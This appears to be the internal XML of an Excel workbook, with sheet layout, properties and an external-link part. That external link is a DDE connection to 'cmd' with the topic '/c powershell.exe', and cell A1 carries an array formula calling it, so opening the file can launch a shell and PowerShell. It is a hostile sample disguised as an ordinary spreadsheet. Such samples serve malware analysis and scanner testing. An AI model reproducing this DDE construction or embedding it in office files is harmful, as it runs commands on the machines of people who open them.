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8_{9AA2FE2C-7EEE-456C-A76C-836448185ED3}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="-120" yWindow="-120" windowWidth="27960" windowHeight="14220" xr2:uid="{6A81592A-8A11-4BE4-BE18-27630BB2A4E9}"/>
  </bookViews>
  <sheets>
    <sheet name="Sheet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 a="1"/>
  <c r="A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tyles" Target="styles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cmd" ddeTopic="/c powershell.exe">
    <ddeItems>
      <ddeItem name="_xlbgnm.A1" advise="1"/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1A46B-060A-4415-8940-325D4D3F4863}">
  <dimension ref="A1"/>
  <sheetViews>
    <sheetView tabSelected="1" workbookViewId="0">
      <selection activeCell="C2" sqref="C2"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <sheetData>
    <row r="1" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A1" t="e" cm="1">
        <f t="array" ref="A1">[1]!_xlbgnm.A1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</dc:creator>
  <cp:lastModifiedBy>jordan</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-10-20T10:16:59Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-10-20T10:26:03Z</dcterms:modified>
</cp:coreProperties>
</file>